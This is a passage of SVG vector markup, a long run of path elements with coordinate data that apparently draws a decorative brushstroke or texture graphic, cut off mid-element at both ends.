.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n        <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n        <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n        <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n        <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n        <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n        <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n        <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n        <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n        <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n        <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n        <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n        <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n        <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n        <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n        <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n        <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n        <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n        <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n        <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n        <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n        <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n        <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n        <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n        <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n        <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n        <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n        <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n        <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n        <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n        <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path 